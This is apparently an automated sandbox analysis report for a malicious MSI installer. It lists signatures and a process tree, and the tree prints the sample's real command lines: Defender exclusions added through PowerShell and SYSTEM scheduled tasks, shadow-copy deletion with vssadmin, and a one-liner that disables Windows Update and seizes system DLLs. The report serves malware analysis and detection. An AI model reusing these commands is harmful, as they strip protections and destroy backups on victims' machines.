Analysis

  • max time kernel
    135s
  • max time network
    152s
  • platform
    windows11-ltsc_2024_x64
  • resource
    win11ltsc2024-20260709-en
  • resource tags

    arch:x64arch:x86image:win11ltsc2024-20260709-enlocale:en-usos:windows11-ltsc_2024-x64systemwindows
  • submitted
    31/07/2026, 04:38

General

  • Target
    install_mal007.msi
  • Size 5.9MB
  • Sample260731-e9e22acg34
  • SHA256 2c1e750f0de09fc53ad94a1f408ecaf598f1d356869d15ec33bb71bcd87b83ba
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Windows security bypass 2 TTPs 10 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Possible privilege escalation attempt 23 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 23 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Badlisted process makes network request 5 IoCs

    Network request originating from process or tool commonly abused by malware.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Indicator Removal: Clear Persistence 1 TTPs 10 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Program Files directory 9 IoCs
  • Drops file in Windows directory 13 IoCs
  • Launches sc.exe 8 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
  • Executes a command shell one-liner 1 TTPs 29 IoCs

    Execution of a cmd.exe one-liner (/c "close" or /k "keep") is a common script/loader stage.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 9 IoCs
  • Modifies registry class 22 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 10 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Windows\system32\msiexec.exe
    msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\install_mal007.msi
    1⤵
    • Enumerates connected drives
    • Event Triggered Execution: Installer Packages
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    PID:1452
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4484
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5008
    • C:\Windows\System32\MsiExec.exe
      C:\Windows\System32\MsiExec.exe -Embedding 49339E9E0B26D3F463ED7BACABBA0905 E Global\MSI0000
      2⤵
      • Loads dropped DLL
      • Badlisted process makes network request
      • Drops file in System32 directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      PID:5748
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Checks SCSI registry key(s)
    • Suspicious use of AdjustPrivilegeToken
    PID:4900
  • C:\Users\Public\bEFnH7\ld4wHX.exe
    "C:\Users\Public\bEFnH7\ld4wHX.exe"
    1⤵
    • Executes dropped EXE
    • Loads dropped DLL
    • Adds Run key to start application
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:4292
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\ProgramData','C:\Users','C:\Program Files (x86)','C:\' -Force
      2⤵
      • Command and Scripting Interpreter: PowerShell
      PID:3476
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\bEFnH7\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
      2⤵
      • Indicator Removal: Clear Persistence
      • Suspicious use of WriteProcessMemory
      PID:5616
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Public\bEFnH7\" /t REG_DWORD /d 0 /f"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1664
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Run /TN "Task1"
        3⤵
          PID:3112
        • C:\Windows\system32\schtasks.exe
          SCHTASKS /Delete /TN "Task1" /F
          3⤵
            PID:3612
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
          2⤵
          • Indicator Removal: Clear Persistence
          • Suspicious use of WriteProcessMemory
          PID:4876
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
            3⤵
            • Scheduled Task/Job: Scheduled Task
            PID:2072
          • C:\Windows\system32\schtasks.exe
            SCHTASKS /Run /TN "Task1"
            3⤵
              PID:5532
            • C:\Windows\system32\schtasks.exe
              SCHTASKS /Delete /TN "Task1" /F
              3⤵
                PID:5620
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
              2⤵
              • Indicator Removal: Clear Persistence
              • Suspicious use of WriteProcessMemory
              PID:4748
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                3⤵
                • Scheduled Task/Job: Scheduled Task
                PID:4812
              • C:\Windows\system32\schtasks.exe
                SCHTASKS /Run /TN "Task1"
                3⤵
                  PID:2104
                • C:\Windows\system32\schtasks.exe
                  SCHTASKS /Delete /TN "Task1" /F
                  3⤵
                    PID:108
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                  2⤵
                  • Indicator Removal: Clear Persistence
                  • Suspicious use of WriteProcessMemory
                  PID:5492
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                    3⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2692
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Run /TN "Task1"
                    3⤵
                      PID:260
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Delete /TN "Task1" /F
                      3⤵
                        PID:3468
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                      2⤵
                      • Indicator Removal: Clear Persistence
                      • Suspicious use of WriteProcessMemory
                      PID:6028
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                        3⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2684
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Run /TN "Task1"
                        3⤵
                          PID:5152
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Delete /TN "Task1" /F
                          3⤵
                            PID:2628
                        • C:\Program Files (x86)\7S1URU\7S1URU.exe
                          "C:\Program Files (x86)\7S1URU\7S1URU.exe"
                          2⤵
                            PID:4596
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\7S1URU" /inheritance:r
                              3⤵
                              • Executes a command shell one-liner
                              PID:1984
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\7S1URU" /inheritance:r
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:3944
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c vssadmin delete shadows /all /quiet
                              3⤵
                              • Executes a command shell one-liner
                              PID:5372
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:5724
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd /c echo.>c:\xxxx.ini
                              3⤵
                              • Executes a command shell one-liner
                              PID:5296
                            • C:\Windows\SysWOW64\cmd.exe
                              cmd.exe /c icacls "C:\Program Files (x86)\7S1URU" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                              3⤵
                              • Executes a command shell one-liner
                              PID:4124
                              • C:\Windows\SysWOW64\icacls.exe
                                icacls "C:\Program Files (x86)\7S1URU" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                4⤵
                                • Possible privilege escalation attempt
                                • Modifies file permissions
                                PID:2596
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\7S1URU\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                              3⤵
                              • Indicator Removal: Clear Persistence
                              PID:1268
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\7S1URU\" /t REG_DWORD /d 0 /f"
                                4⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:4804
                              • C:\Windows\SysWOW64\schtasks.exe
                                SCHTASKS /Run /TN "Task1"
                                4⤵
                                  PID:1260
                                • C:\Windows\SysWOW64\schtasks.exe
                                  SCHTASKS /Delete /TN "Task1" /F
                                  4⤵
                                    PID:1684
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" cmd.exe /q /c "@echo off & (for %i in (wuauserv UsoSvc uhssvc WaaSMedicSvc) do ( net stop %i >nul 2>&1 & sc config %i start= disabled >nul 2>&1 & sc failure %i reset= 0 actions= "" >nul 2>&1 )) & (for %i in (WaaSMedicSvc wuaueng) do ( takeown /f C:\Windows\System32\%i.dll >nul 2>&1 & icacls C:\Windows\System32\%i.dll /grant *S-1-1-0:F >nul 2>&1 & rename C:\Windows\System32\%i.dll %i_BAK.dll >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /setowner "NT SERVICE\TrustedInstaller" >nul 2>&1 & icacls C:\Windows\System32\%i_BAK.dll /remove *S-1-1-0 >nul 2>&1 )) & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f >nul 2>&1 & reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f >nul 2>&1 & reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f >nul 2>&1 & erase /f /s /q c:\windows\softwaredistribution\*.* >nul 2>&1 & rmdir /s /q c:\windows\softwaredistribution >nul 2>&1 & powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}" >nul 2>&1"
                                  3⤵
                                  • Executes a command shell one-liner
                                  PID:2104
                                  • C:\Windows\SysWOW64\net.exe
                                    net stop wuauserv
                                    4⤵
                                      PID:1404
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 stop wuauserv
                                        5⤵
                                          PID:4616
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc config wuauserv start= disabled
                                        4⤵
                                        • Launches sc.exe
                                        PID:5784
                                      • C:\Windows\SysWOW64\sc.exe
                                        sc failure wuauserv reset= 0 actions= ""
                                        4⤵
                                        • Launches sc.exe
                                        PID:2296
                                      • C:\Windows\SysWOW64\net.exe
                                        net stop UsoSvc
                                        4⤵
                                          PID:4336
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 stop UsoSvc
                                            5⤵
                                              PID:1332
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc config UsoSvc start= disabled
                                            4⤵
                                            • Launches sc.exe
                                            PID:3832
                                          • C:\Windows\SysWOW64\sc.exe
                                            sc failure UsoSvc reset= 0 actions= ""
                                            4⤵
                                            • Launches sc.exe
                                            PID:4768
                                          • C:\Windows\SysWOW64\net.exe
                                            net stop uhssvc
                                            4⤵
                                              PID:5772
                                              • C:\Windows\SysWOW64\net1.exe
                                                C:\Windows\system32\net1 stop uhssvc
                                                5⤵
                                                  PID:4800
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc config uhssvc start= disabled
                                                4⤵
                                                • Launches sc.exe
                                                PID:1732
                                              • C:\Windows\SysWOW64\sc.exe
                                                sc failure uhssvc reset= 0 actions= ""
                                                4⤵
                                                • Launches sc.exe
                                                PID:4740
                                              • C:\Windows\SysWOW64\net.exe
                                                net stop WaaSMedicSvc
                                                4⤵
                                                  PID:4936
                                                  • C:\Windows\SysWOW64\net1.exe
                                                    C:\Windows\system32\net1 stop WaaSMedicSvc
                                                    5⤵
                                                      PID:2552
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    sc config WaaSMedicSvc start= disabled
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:2224
                                                  • C:\Windows\SysWOW64\sc.exe
                                                    sc failure WaaSMedicSvc reset= 0 actions= ""
                                                    4⤵
                                                    • Launches sc.exe
                                                    PID:244
                                                  • C:\Windows\SysWOW64\takeown.exe
                                                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:1276
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:1804
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:4268
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\WaaSMedicSvc_BAK.dll /remove *S-1-1-0
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:632
                                                  • C:\Windows\SysWOW64\takeown.exe
                                                    takeown /f C:\Windows\System32\wuaueng.dll
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:3180
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\wuaueng.dll /grant *S-1-1-0:F
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:4952
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\wuaueng_BAK.dll /setowner "NT SERVICE\TrustedInstaller"
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:928
                                                  • C:\Windows\SysWOW64\icacls.exe
                                                    icacls C:\Windows\System32\wuaueng_BAK.dll /remove *S-1-1-0
                                                    4⤵
                                                    • Possible privilege escalation attempt
                                                    • Modifies file permissions
                                                    PID:2440
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                                    4⤵
                                                      PID:6124
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                                      4⤵
                                                        PID:1964
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                                        4⤵
                                                          PID:1420
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                                          4⤵
                                                          • Command and Scripting Interpreter: PowerShell
                                                          PID:6080
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\7S1URU" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:3932
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\7S1URU" /grant:r Users:(OI)(CI)(RX) /deny Users:(OI)(CI)(DC)
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:5960
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\7S1URU\7S1URU.exe" /inheritance:r
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:2192
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\7S1URU\7S1URU.exe" /inheritance:r
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:1880
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd.exe /c icacls "C:\Program Files (x86)\7S1URU\7S1URU.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                        3⤵
                                                        • Executes a command shell one-liner
                                                        PID:5152
                                                        • C:\Windows\SysWOW64\icacls.exe
                                                          icacls "C:\Program Files (x86)\7S1URU\7S1URU.exe" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                          4⤵
                                                          • Possible privilege escalation attempt
                                                          • Modifies file permissions
                                                          PID:4068
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                        3⤵
                                                        • Indicator Removal: Clear Persistence
                                                        PID:3352
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                                          4⤵
                                                          • Scheduled Task/Job: Scheduled Task
                                                          PID:3732
                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                          SCHTASKS /Run /TN "Task1"
                                                          4⤵
                                                            PID:2236
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            SCHTASKS /Delete /TN "Task1" /F
                                                            4⤵
                                                              PID:2888
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c icacls "C:\Program Files (x86)\7S1URU\7S1URU.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:2292
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Program Files (x86)\7S1URU\7S1URU.exe" /grant:r Users:(RX) /deny Users:(DE)
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:2120
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c icacls "C:\Program Files (x86)\7S1URU\image.png" /inheritance:r
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:2240
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Program Files (x86)\7S1URU\image.png" /inheritance:r
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:252
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd.exe /c icacls "C:\Program Files (x86)\7S1URU\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                            3⤵
                                                            • Executes a command shell one-liner
                                                            PID:3100
                                                            • C:\Windows\SysWOW64\icacls.exe
                                                              icacls "C:\Program Files (x86)\7S1URU\image.png" /grant:r Administrators:(OI)(CI)F /grant:r SYSTEM:(OI)(CI)F
                                                              4⤵
                                                              • Possible privilege escalation attempt
                                                              • Modifies file permissions
                                                              PID:5604
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                            3⤵
                                                            • Indicator Removal: Clear Persistence
                                                            PID:2928
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                                              4⤵
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4176
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              SCHTASKS /Run /TN "Task1"
                                                              4⤵
                                                                PID:2108
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                SCHTASKS /Delete /TN "Task1" /F
                                                                4⤵
                                                                  PID:3244
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd.exe /c icacls "C:\Program Files (x86)\7S1URU\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                                3⤵
                                                                • Executes a command shell one-liner
                                                                PID:4636
                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                  icacls "C:\Program Files (x86)\7S1URU\image.png" /grant:r Users:(RX) /deny Users:(DE)
                                                                  4⤵
                                                                  • Possible privilege escalation attempt
                                                                  • Modifies file permissions
                                                                  PID:2584
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                                                3⤵
                                                                • Indicator Removal: Clear Persistence
                                                                PID:5912
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                                                  4⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:5108
                                                                • C:\Windows\SysWOW64\schtasks.exe
                                                                  SCHTASKS /Run /TN "Task1"
                                                                  4⤵
                                                                    PID:4272
                                                                  • C:\Windows\SysWOW64\schtasks.exe
                                                                    SCHTASKS /Delete /TN "Task1" /F
                                                                    4⤵
                                                                      PID:1352
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd.exe /c icacls "C:\Program Files (x86)\7S1URU\thumbs.db" /inheritance:r
                                                                    3⤵
                                                                    • Executes a command shell one-liner
                                                                    PID:824
                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                      icacls "C:\Program Files (x86)\7S1URU\thumbs.db" /inheritance:r
                                                                      4⤵
                                                                      • Possible privilege escalation attempt
                                                                      • Modifies file permissions
                                                                      PID:5740
                                                                  • C:\Windows\SysWOW64\cmd.exe
